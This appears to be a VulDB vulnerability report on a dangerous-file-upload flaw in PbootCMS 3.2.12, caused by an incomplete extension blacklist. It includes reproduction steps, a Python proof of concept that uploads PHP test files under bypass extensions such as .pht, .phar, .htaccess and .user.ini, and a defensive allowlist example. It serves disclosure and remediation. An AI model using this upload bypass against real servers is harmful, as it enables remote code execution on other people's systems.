| Field | Value |
|---|---|
| Title | 翱云科技 PbootCMS 3.2.12 Incomplete Identification of Uploaded File Variables |

Description

Title: PbootCMS 3.2.12 Dangerous File Upload Due to Incomplete Extension Blacklist
Product: PbootCMS
Affected Version: 3.2.12
Vulnerability Type: CWE-434: Unrestricted Upload of File with Dangerous Type
Severity: High
Suggested CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Base Score: 8.8

Overview

The upload validation logic relies on an incomplete blacklist and omits dangerous extensions such as .pht, .phar, .php7, .cgi, .htaccess, and .user.ini. In compatible server environments, an authenticated attacker may upload executable content or files that alter runtime behavior.

Audit Methodology

The issue was identified through static review of the upload validation logic and confirmed by analyzing the proof-of-concept upload workflow.

Audit Workflow

1. Reviewed the upload validation logic in core/function/file.php.
2. Extracted the blacklist used for dangerous-extension filtering.
3. Compared the blacklist against known dangerous script and configuration extensions.
4. Identified omitted extensions that may still be interpreted by common server configurations.
5. Verified the upload path and runtime test strategy through the existing PoC script.

Affected Code Location

File: core/function/file.php

```php
$black = array(
    'php', 'jsp', 'asp', 'vb', 'exe', 'sh', 'cmd',
    'bat', 'vbs', 'phtml', 'class',
    'php2', 'php3', 'php4', 'php5'
);
```

Root Cause

The application uses a blacklist instead of a strict allowlist. Blacklists are brittle: they cannot enumerate every alternate executable extension, and they do not account for server-specific parsing behavior that maps additional extensions to script handlers.

Reproduction Steps

1. Authenticate as a user who can access /member/upload.
2. Upload a file with an omitted dangerous extension such as .pht.
3. If the server environment maps that extension to executable code, request the uploaded file directly.

Embedded PoC Script

Source: security_poc/poc_upload_bypass.py
```python
import io
import requests

# Extensions omitted from the blacklist in core/function/file.php, with the reason each matters.
BYPASS_EXTENSIONS = [
    ("pht", "Apache default PHP-mapped extension in some environments"),
    ("phar", "PHP archive file"),
    ("php7", "Alternate PHP extension"),
    ("phps", "PHP source extension in some setups"),
    ("shtml", "SSI server-side include"),
    ("cgi", "CGI script"),
    ("htaccess", "Apache override configuration file"),
    ("user.ini", "PHP per-directory configuration file"),
]


def test_upload_bypass(base_url, session, cookie=None):
    """Submit one test file per omitted extension to /member/upload and print the response."""
    upload_url = base_url.rstrip("/") + "/member/upload"
    if cookie:
        # Reuse an existing authenticated member session; the endpoint requires login.
        session.headers["Cookie"] = cookie
    test_content = b"<?php echo 'PBOOTCMS_UPLOAD_TEST'; ?>"
    for ext, desc in BYPASS_EXTENSIONS:
        filename = f"test_poc.{ext}"
        files = {
            "upload": (filename, io.BytesIO(test_content), "application/octet-stream")
        }
        resp = session.post(upload_url, files=files, timeout=10)
        # Status code and the first 200 bytes of the body show whether the upload was accepted.
        print(filename, resp.status_code, resp.text[:200])


session = requests.Session()
test_upload_bypass("http://localhost:8888", session)
```
Impact

- Remote code execution in susceptible deployments
- Upload of attacker-controlled files into web-accessible directories
- Potential server behavior manipulation through .htaccess or .user.ini

Remediation

- Replace the blacklist with a strict allowlist of permitted file types
- Store uploads outside the web root
- Disable script execution in upload directories
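To make the Root Cause and Remediation points concrete, the following Python is an added example (not code from the report, from VulDB, or from PbootCMS). It models the report's last-extension blacklist check beside a strict allowlist check and runs both over the filenames the report names. The allowlist contents (`jpg`, `jpeg`, `png`, `gif`, `webp`, `pdf`), the upload directory `/srv/pbootcms_uploads`, and the server-generated storage name are assumptions chosen for illustration.

```python
import re
import secrets

# Blacklist as excerpted in the report from core/function/file.php (PbootCMS 3.2.12).
PBOOT_BLACKLIST = {
    "php", "jsp", "asp", "vb", "exe", "sh", "cmd",
    "bat", "vbs", "phtml", "class",
    "php2", "php3", "php4", "php5",
}

# Assumed allowlist for an image/document upload feature; adjust per feature.
UPLOAD_ALLOWLIST = {"jpg", "jpeg", "png", "gif", "webp", "pdf"}

# Filenames built from the extensions the report lists as omitted, plus a normal
# image and a blacklisted name for contrast (constructed sample input).
REPORT_SAMPLES = [
    "test_poc.pht", "test_poc.phar", "test_poc.php7", "test_poc.phps",
    "test_poc.shtml", "test_poc.cgi", ".htaccess", ".user.ini",
    "test_poc.php", "photo.jpg",
]


def last_extension(filename):
    """Extension as a naive check sees it: text after the final dot, lower-cased."""
    name = filename.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def blacklist_allows(filename):
    """Model of the flawed check: accept unless the last extension is blacklisted.
    Names like .htaccess ("htaccess") and .user.ini ("ini") sail through."""
    return last_extension(filename) not in PBOOT_BLACKLIST


# Exactly one dot, a restricted basename, and a short alphanumeric extension.
_SAFE_NAME = re.compile(r"[a-z0-9_-]{1,64}\.([a-z0-9]{1,5})")


def allowlist_allows(filename):
    """Strict allowlist: rejects dotfiles (.htaccess), multi-dot names
    (.user.ini, x.php.jpg) and any extension not explicitly permitted,
    regardless of how a particular server maps that extension."""
    name = filename.rsplit("/", 1)[-1].lower()
    m = _SAFE_NAME.fullmatch(name)
    return bool(m) and m.group(1) in UPLOAD_ALLOWLIST


def storage_path(filename, upload_root="/srv/pbootcms_uploads"):
    """Server-chosen name under a directory outside the web root (assumed path).
    The client-supplied basename is never reused. Returns None when rejected."""
    if not allowlist_allows(filename):
        return None
    return upload_root.rstrip("/") + "/" + secrets.token_hex(16) + "." + last_extension(filename)


def compare(filenames=REPORT_SAMPLES):
    """Map each sample filename to (blacklist verdict, allowlist verdict)."""
    return {f: (blacklist_allows(f), allowlist_allows(f)) for f in filenames}


if __name__ == "__main__":
    for f, (bl, al) in compare().items():
        print(f"{f:16} blacklist={'ACCEPT' if bl else 'reject':6}  "
              f"allowlist={'ACCEPT' if al else 'reject'}")
```

Running the block prints one line per sample; every extension the report lists as omitted is accepted by the blacklist model and rejected by the allowlist, while `photo.jpg` passes both. `storage_path` pairs the allowlist with the other two remediation items: the file lands outside the web root under a random name, so even a mis-mapped extension is never reachable by URL.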

| Field | Value |
|---|---|
| Source | ⚠️ https://github.com/zzj-create/cvetest/blob/main/VULN-04_DANGEROUS_FILE_UPLOAD_REPORT_EN.md |
| User | zmjjkk (UID 96182) |
| Submission | 06/03/2026 12h41 (3 months ago) |
| Moderation | 20/03/2026 15h26 (14 days later) |
| Status | Accepted |
| VulDB Entry | 352075 [PbootCMS up to 3.2.12 File Upload core/function/file.php black Privilege Escalation] |
| Points | 20 |